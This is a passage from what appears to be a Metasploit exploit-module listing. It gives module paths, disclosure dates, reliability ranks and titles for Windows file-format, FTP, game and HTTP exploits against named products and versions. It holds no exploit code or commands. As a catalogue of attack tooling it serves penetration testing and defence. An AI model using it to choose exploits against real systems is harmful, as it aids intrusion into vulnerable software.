Overflow + windows/fileformat/ezip_wizard_bof 2009-03-09 good No eZip Wizard 3.0 Stack Buffer Overflow + windows/fileformat/fatplayer_wav 2010-10-18 normal No Fat Player Media Player 0.6b0 Buffer Overflow + windows/fileformat/fdm_torrent 2009-02-02 good No Free Download Manager Torrent Parsing Buffer Overflow + windows/fileformat/feeddemon_opml 2009-02-09 great No FeedDemon Stack Buffer Overflow + windows/fileformat/foxit_reader_filewrite 2011-03-05 normal No Foxit PDF Reader 4.2 Javascript File Write + windows/fileformat/foxit_reader_launch 2009-03-09 good No Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow + windows/fileformat/foxit_reader_uaf 2018-04-20 normal No Foxit PDF Reader Pointer Overwrite UAF + windows/fileformat/foxit_title_bof 2010-11-13 great No Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow + windows/fileformat/free_mp3_ripper_wav 2011-08-27 great No Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow + windows/fileformat/galan_fileformat_bof 2009-12-07 normal No gAlan 0.2.1 Buffer Overflow + windows/fileformat/gsm_sim 2010-07-07 normal No GSM SIM Editor 5.15 Buffer Overflow + windows/fileformat/gta_samp 2011-09-18 normal No GTA SA-MP server.cfg Buffer Overflow + windows/fileformat/hhw_hhp_compiledfile_bof 2006-02-06 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow + windows/fileformat/hhw_hhp_contentfile_bof 2006-02-06 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow + windows/fileformat/hhw_hhp_indexfile_bof 2009-01-17 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow + windows/fileformat/homm3_h3m 2015-07-29 normal No Heroes of Might and Magic III .h3m Map file Buffer Overflow + windows/fileformat/ht_mp3player_ht3_bof 2009-06-29 good No HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow + windows/fileformat/ibm_forms_viewer_fontname 2013-12-05 normal No IBM Forms Viewer Unicode Buffer Overflow + windows/fileformat/ibm_pcm_ws 2012-02-28 great No IBM Personal Communications iSeries Access WorkStation 5.9 Profile + windows/fileformat/icofx_bof 2013-12-10 normal No IcoFX Stack Buffer Overflow + windows/fileformat/ideal_migration_ipj 2009-12-05 great No PointDev IDEAL Migration Buffer Overflow + windows/fileformat/iftp_schedule_bof 2014-11-06 normal No i-FTP Schedule Buffer Overflow + windows/fileformat/irfanview_jpeg2000_bof 2012-01-16 normal No Irfanview JPEG2000 jp2 Stack Buffer Overflow + windows/fileformat/ispvm_xcf_ispxcf 2012-05-16 normal No Lattice Semiconductor ispVM System XCF File Handling Overflow + windows/fileformat/kingview_kingmess_kvl 2012-11-20 normal No KingView Log File Parsing Buffer Overflow + windows/fileformat/lattice_pac_bof 2012-05-16 normal No Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow + windows/fileformat/lotusnotes_lzh 2011-05-24 good No Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) + windows/fileformat/magix_musikmaker_16_mmm 2011-04-26 good No Magix Musik Maker 16 .mmm Stack Buffer Overflow + windows/fileformat/mcafee_hercules_deletesnapshot 2008-08-04 low No McAfee Remediation Client ActiveX Control Buffer Overflow + windows/fileformat/mcafee_showreport_exec 2012-01-12 normal No McAfee SaaS MyCioScan ShowReport Remote Command Execution + windows/fileformat/mediacoder_m3u 2013-06-24 normal No MediaCoder .M3U Buffer Overflow + windows/fileformat/mediajukebox 2009-07-01 normal No Media Jukebox 8.0.400 Buffer Overflow (SEH) + windows/fileformat/microp_mppl 2010-08-23 great No MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow + windows/fileformat/millenium_mp3_pls 2009-07-30 great No Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow + windows/fileformat/mini_stream_pls_bof 2010-07-16 great No Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow + windows/fileformat/mjm_coreplayer2011_s3m 2011-04-30 good No MJM Core Player 2011 .s3m Stack Buffer Overflow + windows/fileformat/mjm_quickplayer_s3m 2011-04-30 good No MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow + windows/fileformat/moxa_mediadbplayback 2010-10-19 average No MOXA MediaDBPlayback ActiveX Control Buffer Overflow + windows/fileformat/mplayer_m3u_bof 2011-03-19 average No MPlayer Lite M3U Buffer Overflow + windows/fileformat/mplayer_sami_bof 2011-05-19 normal No MPlayer SAMI Subtitle File Buffer Overflow + windows/fileformat/ms09_067_excel_featheader 2009-11-10 good No MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability + windows/fileformat/ms10_004_textbytesatom 2010-02-09 good No MS10-004 Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow + windows/fileformat/ms10_038_excel_obj_bof 2010-06-08 normal No MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow + windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great No MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format) + windows/fileformat/ms11_006_createsizeddibsection 2010-12-15 great No MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow + windows/fileformat/ms11_021_xlb_bof 2011-08-09 normal No MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow + windows/fileformat/ms12_005 2012-01-10 excellent No MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability + windows/fileformat/ms12_027_mscomctl_bof 2012-04-10 average No MS12-027 MSCOMCTL ActiveX Buffer Overflow + windows/fileformat/ms13_071_theme 2013-09-10 excellent No MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution + windows/fileformat/ms14_017_rtf 2014-04-01 normal No MS14-017 Microsoft Word RTF Object Confusion + windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution + windows/fileformat/ms14_064_packager_python 2014-11-12 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python + windows/fileformat/ms14_064_packager_run_as_admin 2014-10-21 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution + windows/fileformat/ms15_020_shortcut_icon_dllloader 2015-03-10 excellent No Microsoft Windows Shell LNK Code Execution + windows/fileformat/ms15_100_mcl_exe 2015-09-08 excellent No MS15-100 Microsoft Windows Media Center MCL Vulnerability + windows/fileformat/ms_visual_basic_vbp 2007-09-04 good No Microsoft Visual Basic VBP Buffer Overflow + windows/fileformat/mswin_tiff_overflow 2013-11-05 average No MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow + windows/fileformat/msworks_wkspictureinterface 2008-11-28 low No Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution + windows/fileformat/mymp3player_m3u 2010-03-18 good No Steinberg MyMP3Player 3.0 Buffer Overflow + windows/fileformat/netop 2011-04-28 normal No NetOp Remote Control Client 9.5 Buffer Overflow + windows/fileformat/nitro_reader_jsapi 2017-07-24 excellent No Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution + windows/fileformat/nuance_pdf_launch_overflow 2010-10-08 great No Nuance PDF Reader v6.0 Launch Stack Buffer Overflow + windows/fileformat/office_dde_delivery 2017-10-09 manual No Microsoft Office DDE Payload Delivery + windows/fileformat/office_excel_slk 2018-10-07 manual No Microsoft Excel .SLK Payload Delivery + windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882 + windows/fileformat/office_ole_multiple_dll_hijack 2015-12-08 normal No Office OLE Multiple DLL Side Loading Vulnerabilities + windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution + windows/fileformat/openoffice_ole 2008-04-17 normal No OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow + windows/fileformat/orbit_download_failed_bof 2008-04-03 normal No Orbit Downloader URL Unicode Conversion Overflow + windows/fileformat/orbital_viewer_orb 2010-02-27 great No Orbital Viewer ORB File Parsing Buffer Overflow + windows/fileformat/ovf_format_string 2012-11-08 normal No VMWare OVF Tools Format String Vulnerability + windows/fileformat/proshow_cellimage_bof 2009-08-20 great No ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow + windows/fileformat/proshow_load_bof 2012-06-06 normal No Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow + windows/fileformat/publishit_pui 2014-02-05 normal No Publish-It PUI Buffer Overflow (SEH) + windows/fileformat/real_networks_netzip_bof 2011-01-30 good No Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability + windows/fileformat/real_player_url_property_bof 2012-12-14 normal No RealPlayer RealMedia File Handling Buffer Overflow + windows/fileformat/realplayer_ver_attribute_bof 2013-12-20 normal No RealNetworks RealPlayer Version Attribute Buffer Overflow + windows/fileformat/safenet_softremote_groupname 2009-10-30 good No SafeNet SoftRemote GROUPNAME Buffer Overflow + windows/fileformat/sascam_get 2008-12-29 low No SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow + windows/fileformat/scadaphone_zip 2011-09-12 good No ScadaTEC ScadaPhone Stack Buffer Overflow + windows/fileformat/shadow_stream_recorder_bof 2010-03-29 normal No Shadow Stream Recorder 3.0.1.7 Buffer Overflow + windows/fileformat/shaper_pdf_bof 2015-10-03 normal No PDF Shaper Buffer Overflow + windows/fileformat/somplplayer_m3u 2010-01-22 great No S.O.M.P.L 1.0 Player Buffer Overflow + windows/fileformat/subtitle_processor_m3u_bof 2011-04-26 normal No Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow + windows/fileformat/syncbreeze_xml 2017-03-29 normal No Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow + windows/fileformat/tfm_mmplayer_m3u_ppl_bof 2012-03-23 good No TFM MMPlayer (m3u/ppl File) Buffer Overflow + windows/fileformat/total_video_player_ini_bof 2013-11-24 normal No Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow + windows/fileformat/tugzip 2008-10-28 good No TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability + windows/fileformat/ultraiso_ccd 2009-04-03 great No UltraISO CCD File Parsing Buffer Overflow + windows/fileformat/ultraiso_cue 2007-05-24 great No UltraISO CUE File Parsing Buffer Overflow + windows/fileformat/ursoft_w32dasm 2005-01-24 good No URSoft W32Dasm Disassembler Function Buffer Overflow + windows/fileformat/varicad_dwb 2010-03-17 great No VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow + windows/fileformat/videocharge_studio 2013-10-27 normal No VideoCharge Studio Buffer Overflow (SEH) + windows/fileformat/videolan_tivo 2008-10-22 good No VideoLAN VLC TiVo Buffer Overflow + windows/fileformat/videospirit_visprj 2011-04-11 good No VeryTools Video Spirit Pro + windows/fileformat/visio_dxf_bof 2010-05-04 good No Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability + windows/fileformat/visiwave_vwr_type 2011-05-20 great No VisiWave VWR File Parsing Vulnerability + windows/fileformat/vlc_mkv 2018-05-24 great No VLC Media Player MKV Use After Free + windows/fileformat/vlc_modplug_s3m 2011-04-07 average No VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow + windows/fileformat/vlc_realtext 2008-11-05 good No VLC Media Player RealText Subtitle Overflow + windows/fileformat/vlc_smb_uri 2009-06-24 great No VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow + windows/fileformat/vlc_webm 2011-01-31 good No VideoLAN VLC MKV Memory Corruption + windows/fileformat/vuplayer_cue 2009-08-18 good No VUPlayer CUE Buffer Overflow + windows/fileformat/vuplayer_m3u 2009-08-18 good No VUPlayer M3U Buffer Overflow + windows/fileformat/watermark_master 2013-11-01 normal No Watermark Master Buffer Overflow (SEH) + windows/fileformat/winamp_maki_bof 2009-05-20 normal No Winamp MAKI Buffer Overflow + windows/fileformat/winrar_name_spoofing 2009-09-28 excellent No WinRAR Filename Spoofing + windows/fileformat/wireshark_mpeg_overflow 2014-03-20 good No Wireshark wiretap/mpeg.c Stack Buffer Overflow + windows/fileformat/wireshark_packet_dect 2011-04-18 good No Wireshark packet-dect.c Stack Buffer Overflow (local) + windows/fileformat/wm_downloader_m3u 2010-07-28 normal No WM Downloader 3.1.2.2 Buffer Overflow + windows/fileformat/xenorate_xpl_bof 2009-08-19 great No Xenorate 2.50 (.xpl) Universal Local Buffer Overflow (SEH) + windows/fileformat/xion_m3u_sehbof 2010-11-23 great No Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow + windows/fileformat/xradio_xrl_sehbof 2011-02-08 normal No xRadio 0.95b Buffer Overflow + windows/fileformat/zahir_enterprise_plus_csv 2018-09-28 normal No Zahir Enterprise Plus 6 Stack Buffer Overflow + windows/fileformat/zinfaudioplayer221_pls 2004-09-24 good No Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow + windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow + windows/firewall/kerio_auth 2003-04-28 average No Kerio Firewall 2.1.4 Authentication Packet Overflow + windows/ftp/32bitftp_list_reply 2010-10-12 good No 32bit FTP Client Stack Buffer Overflow + windows/ftp/3cdaemon_ftp_user 2005-01-04 average Yes 3Com 3CDaemon 2.0 FTP Username Overflow + windows/ftp/aasync_list_reply 2010-10-12 good No AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST) + windows/ftp/ability_server_stor 2004-10-22 normal Yes Ability Server 2.34 STOR Command Stack Buffer Overflow + windows/ftp/absolute_ftp_list_bof 2011-11-09 normal No AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow + windows/ftp/ayukov_nftp 2017-10-21 normal No Ayukov NFTP FTP Client Buffer Overflow + windows/ftp/bison_ftp_bof 2011-08-07 normal Yes BisonWare BisonFTP Server Buffer Overflow + windows/ftp/cesarftp_mkd 2006-06-12 average Yes Cesar FTP 0.99g MKD Command Buffer Overflow + windows/ftp/comsnd_ftpd_fmtstr 2012-06-08 good Yes ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability + windows/ftp/dreamftp_format 2004-03-03 good Yes BolinTech Dream FTP Server 1.02 Format String + windows/ftp/easyfilesharing_pass 2006-07-31 average Yes Easy File Sharing FTP Server 2.0 PASS Overflow + windows/ftp/easyftp_cwd_fixret 2010-02-16 great Yes EasyFTP Server CWD Command Stack Buffer Overflow + windows/ftp/easyftp_list_fixret 2010-07-05 great Yes EasyFTP Server LIST Command Stack Buffer Overflow + windows/ftp/easyftp_mkd_fixret 2010-04-04 great Yes EasyFTP Server MKD Command Stack Buffer Overflow + windows/ftp/filecopa_list_overflow 2006-07-19 average No FileCopa FTP Server Pre 18 Jul Version + windows/ftp/filewrangler_list_reply 2010-10-12 good No FileWrangler 5.30 Stack Buffer Overflow + windows/ftp/freefloatftp_user 2012-06-12 normal Yes Free Float FTP Server USER Command Buffer Overflow + windows/ftp/freefloatftp_wbem 2012-12-07 excellent Yes FreeFloat FTP Server Arbitrary File Upload + windows/ftp/freeftpd_pass 2013-08-20 normal Yes freeFTPd PASS Command Buffer Overflow + windows/ftp/freeftpd_user 2005-11-16 average Yes freeFTPd 1.0 Username Overflow + windows/ftp/ftpgetter_pwd_reply 2010-10-12 good No FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD) + windows/ftp/ftppad_list_reply 2010-10-12 good No FTPPad 1.2.0 Stack Buffer Overflow + windows/ftp/ftpshell51_pwd_reply 2010-10-12 good No FTPShell 5.1 Stack Buffer Overflow + windows/ftp/ftpshell_cli_bof 2017-03-04 normal No FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow + windows/ftp/ftpsynch_list_reply 2010-10-12 good No FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow + windows/ftp/gekkomgr_list_reply 2010-10-12 good No Gekko Manager FTP Client Stack Buffer Overflow + windows/ftp/globalscapeftp_input 2005-05-01 great No GlobalSCAPE Secure FTP Server Input Overflow + windows/ftp/goldenftp_pass_bof 2011-01-23 average Yes GoldenFTP PASS Stack Buffer Overflow + windows/ftp/httpdx_tolog_format 2009-11-17 great Yes HTTPDX tolog() Function Format String Vulnerability + windows/ftp/kmftp_utility_cwd 2015-08-23 normal Yes Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow + windows/ftp/labf_nfsaxe 2017-05-15 normal No LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow + windows/ftp/leapftp_list_reply 2010-10-12 good No LeapFTP 3.0.1 Stack Buffer Overflow + windows/ftp/leapftp_pasv_reply 2003-06-09 normal No LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow + windows/ftp/ms09_053_ftpd_nlst 2009-08-31 great No MS09-053 Microsoft IIS FTP Server NLST Response Overflow + windows/ftp/netterm_netftpd_user 2005-04-26 great Yes NetTerm NetFTPD USER Buffer Overflow + windows/ftp/odin_list_reply 2010-10-12 good No Odin Secure FTP 4.1 Stack Buffer Overflow (LIST) + windows/ftp/open_ftpd_wbem 2012-06-18 excellent Yes Open-FTPD 1.2 Arbitrary File Upload + windows/ftp/oracle9i_xdb_ftp_pass 2003-08-18 great Yes Oracle 9i XDB FTP PASS Overflow (win32) + windows/ftp/oracle9i_xdb_ftp_unlock 2003-08-18 great Yes Oracle 9i XDB FTP UNLOCK Overflow (win32) + windows/ftp/pcman_put 2015-08-07 normal Yes PCMAN FTP Server Buffer Overflow - PUT Command + windows/ftp/pcman_stor 2013-06-27 normal Yes PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow + windows/ftp/proftp_banner 2009-08-25 normal No ProFTP 2.9 Banner Remote Buffer Overflow + windows/ftp/quickshare_traversal_write 2011-02-03 excellent Yes QuickShare File Server 1.2.1 Directory Traversal Vulnerability + windows/ftp/ricoh_dl_bof 2012-03-01 normal Yes Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow + windows/ftp/sami_ftpd_list 2013-02-27 low No Sami FTP Server LIST Command Buffer Overflow + windows/ftp/sami_ftpd_user 2006-01-24 normal Yes KarjaSoft Sami FTP Server v2.02 USER Overflow + windows/ftp/sasser_ftpd_port 2004-05-10 average No Sasser Worm avserve FTP PORT Buffer Overflow + windows/ftp/scriptftp_list 2011-10-12 good No ScriptFTP LIST Remote Buffer Overflow + windows/ftp/seagull_list_reply 2010-10-12 good No Seagull FTP v3.3 Build 409 Stack Buffer Overflow + windows/ftp/servu_chmod 2004-12-31 normal Yes Serv-U FTP Server Buffer Overflow + windows/ftp/servu_mdtm 2004-02-26 good Yes Serv-U FTPD MDTM Overflow + windows/ftp/slimftpd_list_concat 2005-07-21 great No SlimFTPd LIST Concatenation Overflow + windows/ftp/trellian_client_pasv 2010-04-11 normal No Trellian FTP Client 3.01 PASV Remote Buffer Overflow + windows/ftp/turboftp_port 2012-10-03 great Yes Turbo FTP Server 1.30.823 PORT Overflow + windows/ftp/vermillion_ftpd_port 2009-09-23 great Yes Vermillion FTP Daemon PORT Command Memory Corruption + windows/ftp/warftpd_165_pass 1998-03-19 average No War-FTPD 1.65 Password Overflow + windows/ftp/warftpd_165_user 1998-03-19 average No War-FTPD 1.65 Username Overflow + windows/ftp/wftpd_size 2006-08-23 average No Texas Imperial Software WFTPD 3.23 SIZE Overflow + windows/ftp/winaxe_server_ready 2016-11-03 good No WinaXe 7.7 FTP Client Remote Buffer Overflow + windows/ftp/wing_ftp_admin_exec 2014-06-19 excellent Yes Wing FTP Server Authenticated Command Execution + windows/ftp/wsftp_server_503_mkd 2004-11-29 great Yes WS-FTP Server 5.03 MKD Overflow + windows/ftp/wsftp_server_505_xmd5 2006-09-14 average Yes Ipswitch WS_FTP Server 5.05 XMD5 Overflow + windows/ftp/xftp_client_pwd 2010-04-22 normal No Xftp FTP Client 3.0 PWD Remote Buffer Overflow + windows/ftp/xlink_client 2009-10-03 normal No Xlink FTP Client Buffer Overflow + windows/ftp/xlink_server 2009-10-03 good Yes Xlink FTP Server Buffer Overflow + windows/games/mohaa_getinfo 2004-07-17 great No Medal of Honor Allied Assault getinfo Stack Buffer Overflow + windows/games/racer_503beta5 2008-08-10 great No Racer v0.5.3 Beta 5 Buffer Overflow + windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32) + windows/http/adobe_robohelper_authbypass 2009-09-23 excellent No Adobe RoboHelp Server 8 Arbitrary File Upload and Execute + windows/http/altn_securitygateway 2008-06-02 average Yes Alt-N SecurityGateway username Buffer Overflow + windows/http/altn_webadmin 2003-06-24 average No Alt-N WebAdmin USER Buffer Overflow + windows/http/amlibweb_webquerydll_app 2010-08-03 normal Yes Amlibweb NetOpacs webquery.dll Stack Buffer Overflow + windows/http/apache_chunked 2002-06-19 good Yes Apache Win32 Chunked Encoding + windows/http/apache_mod_rewrite_ldap 2006-07-28 great Yes Apache Module mod_rewrite LDAP Protocol Buffer Overflow + windows/http/apache_modjk_overflow 2007-03-02 great Yes Apache mod_jk 1.2.20 Buffer Overflow + windows/http/avaya_ccr_imageupload_exec 2012-06-28 excellent No Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution + windows/http/badblue_ext_overflow 2003-04-20 great Yes BadBlue 2.5 EXT.dll Buffer Overflow + windows/http/badblue_passthru 2007-12-10 great No BadBlue 2.72b PassThru Buffer Overflow + windows/http/bea_weblogic_jsessionid 2009-01-13 good No BEA WebLogic JSESSIONID Cookie Value Overflow + windows/http/bea_weblogic_post_bof 2008-07-17 great Yes Oracle Weblogic Apache Connector POST Request Buffer Overflow + windows/http/bea_weblogic_transfer_encoding 2008-09-09 great No BEA Weblogic Transfer-Encoding Buffer Overflow + windows/http/belkin_bulldog 2009-03-08 average No Belkin Bulldog Plus Web Service Buffer Overflow + windows/http/ca_arcserve_rpc_authbypass 2011-07-25 excellent No CA Arcserve D2D GWT RPC Credential Information Disclosure + windows/http/ca_igateway_debug 2005-10-06 average Yes CA iTechnology iGateway Debug Mode Buffer Overflow + windows/http/ca_totaldefense_regeneratereports 2011-04-13 excellent No CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection + windows/http/cogent_datahub_command 2014-04-29 manual Yes Cogent DataHub Command Injection + windows/http/cogent_datahub_request_headers_bof 2013-07-26 normal Yes Cogent DataHub HTTP Server Buffer Overflow + windows/http/coldfusion_fckeditor 2009-07-03 excellent No ColdFusion 8.0.1 Arbitrary File Upload and Execute + windows/http/cyclope_ess_sqli 2012-08-08 excellent Yes Cyclope Employee Surveillance Solution v6 SQL Injection + windows/http/desktopcentral_file_upload 2013-11-11 excellent Yes ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload + windows/http/desktopcentral_statusupdate_upload 2014-08-31 excellent Yes ManageEngine Desktop Central StatusUpdate Arbitrary File Upload + windows/http/disk_pulse_enterprise_bof 2016-10-03 excellent Yes Disk Pulse Enterprise Login Buffer Overflow + windows/http/disk_pulse_enterprise_get 2017-08-25 excellent Yes Disk Pulse Enterprise GET Buffer Overflow + windows/http/diskboss_get_bof 2016-12-05 excellent Yes DiskBoss Enterprise GET Buffer Overflow + windows/http/disksavvy_get_bof 2016-12-01 excellent Yes DiskSavvy Enterprise GET Buffer Overflow + windows/http/disksorter_bof 2017-03-15 great Yes Disk Sorter Enterprise GET Buffer Overflow + windows/http/dup_scout_enterprise_login_bof 2017-11-14 excellent Yes Dup Scout Enterprise Login Buffer Overflow + windows/http/dupscts_bof 2017-03-15 great Yes Dup Scout Enterprise GET Buffer Overflow + windows/http/easychatserver_seh 2017-10-09 normal No Easy Chat Server User Registeration Buffer Overflow (SEH) + windows/http/easyfilesharing_post 2017-06-12 normal No Easy File Sharing HTTP Server 7.2 POST Buffer Overflow + windows/http/easyfilesharing_seh 2015-12-02 normal No Easy File Sharing HTTP Server 7.2 SEH Overflow + windows/http/easyftp_list 2010-02-18 great Yes EasyFTP Server list.html path Stack Buffer Overflow + windows/http/edirectory_host 2006-10-21 great No Novell eDirectory NDS Server Host Header Overflow + windows/http/edirectory_imonitor 2005-08-11 great No eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow + windows/http/efs_easychatserver_username 2007-08-14 great Yes EFS Easy Chat Server Authentication Request Handling Buffer Overflow + windows/http/efs_fmws_userid_bof 2014-05-20 normal Yes Easy File Management Web Server Stack Buffer Overflow + windows/http/ektron_xslt_exec 2012-10-16 excellent Yes Ektron 8.02 XSLT Transform Remote Code Execution + windows/http/ektron_xslt_exec_ws 2015-02-05 excellent Yes Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution + windows/http/ericom_access_now_bof 2014-06-02 normal Yes Ericom AccessNow Server Buffer Overflow + windows/http/ezserver_http 2012-06-18 excellent No EZHomeTech EzServer Stack Buffer Overflow Vulnerability + windows/http/fdm_auth_header 2009-02-02 great No Free Download Manager Remote Control Server Buffer Overflow + windows/http/generic_http_dll_injection 2015-03-04 manual No Generic Web Application DLL Injection + windows/http/geutebrueck_gcore_x64_rce_bo 2017-01-24 normal Yes Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE + windows/http/gitstack_rce 2018-01-15 great No GitStack Unsanitized Argument RCE + windows/http/hp_autopass_license_traversal 2014-01-10 great Yes HP AutoPass License Server File Upload + windows/http/hp_imc_bims_upload 2013-10-08 excellent Yes HP Intelligent Management Center BIMS UploadServlet Directory Traversal + windows/http/hp_imc_java_deserialize 2017-10-03 excellent Yes HP Intelligent Management Java Deserialization RCE + windows/http/hp_imc_mibfileupload 2013-03-07 great Yes HP Intelligent Management Center Arbitrary File Upload + windows/http/hp_loadrunner_copyfiletoserver 2013-10-30 excellent Yes HP LoadRunner EmulationAdmin Web Service Directory Traversal + windows/http/hp_mpa_job_acct 2011-12-21 excellent Yes HP Managed Printing Administration jobAcct Remote Command Execution + windows/http/hp_nnm_getnnmdata_hostname 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow + windows/http/hp_nnm_getnnmdata_icount 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow + windows/http/hp_nnm_getnnmdata_maxage 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow + windows/http/hp_nnm_nnmrptconfig_nameparams 2011-01-10 normal No HP OpenView NNM nnmRptConfig nameParams Buffer Overflow + windows/http/hp_nnm_nnmrptconfig_schdparams 2011-01-10 normal No HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow + windows/http/hp_nnm_openview5 2007-12-06 great No HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow + windows/http/hp_nnm_ovalarm_lang 2009-12-09 great No HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow + windows/http/hp_nnm_ovas 2008-04-02 good Yes HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow + windows/http/hp_nnm_ovbuildpath_textfile 2011-11-01 normal No HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow + windows/http/hp_nnm_ovwebhelp 2009-12-09 great No HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow + windows/http/hp_nnm_ovwebsnmpsrv_main 2010-06-16 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow + windows/http/hp_nnm_ovwebsnmpsrv_ovutil 2010-06-16 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow + windows/http/hp_nnm_ovwebsnmpsrv_uro 2010-06-08 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow + windows/http/hp_nnm_snmp 2009-12-09 great No HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow + windows/http/hp_nnm_snmpviewer_actapp 2010-05-11 great No HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow + windows/http/hp_nnm_toolbar_01 2009-01-07 great No HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow + windows/http/hp_nnm_toolbar_02 2009-01-21 normal No HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow + windows/http/hp_nnm_webappmon_execvp 2010-07-20 great No HP OpenView Network Node Manager execvp_nc Buffer Overflow + windows/http/hp_nnm_webappmon_ovjavalocale 2010-08-03 great No HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow + windows/http/hp_openview_insight_backdoor 2011-01-31 excellent No HP OpenView Performance Insight Server Backdoor Account Code Execution + windows/http/hp_pcm_snac_update_certificates 2013-09-09 excellent Yes HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload + windows/http/hp_pcm_snac_update_domain 2013-09-09 excellent Yes HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload + windows/http/hp_power_manager_filename 2011-10-19 normal No HP Power Manager 'formExportDataLogs' Buffer Overflow + windows/http/hp_power_manager_login 2009-11-04 average No Hewlett-Packard Power Manager Administration Buffer Overflow + windows/http/hp_sitescope_dns_tool 2015-10-09 good No HP SiteScope DNS Tool Command Injection + windows/http/hp_sitescope_runomagentcommand 2013-07-29 manual Yes HP SiteScope Remote Code Execution + windows/http/httpdx_handlepeer 2009-10-08 great Yes HTTPDX h_handlepeer() Function Buffer Overflow + windows/http/httpdx_tolog_format 2009-11-17 great Yes HTTPDX tolog() Function Format String Vulnerability + windows/http/ia_webmail 2003-11-03 average No IA WebMail 3.x Buffer Overflow + windows/http/ibm_tivoli_endpoint_bof 2011-05-31 good No IBM Tivoli Endpoint Manager POST Query Buffer Overflow + windows/http/ibm_tpmfosd_overflow 2007-05-02 good No IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow + windows/http/ibm_tsm_cad_header 2007-09-24 good No IBM Tivoli Storage Manager Express CAD Service Buffer Overflow + windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite + windows/http/integard_password_bof 2010-09-07 great 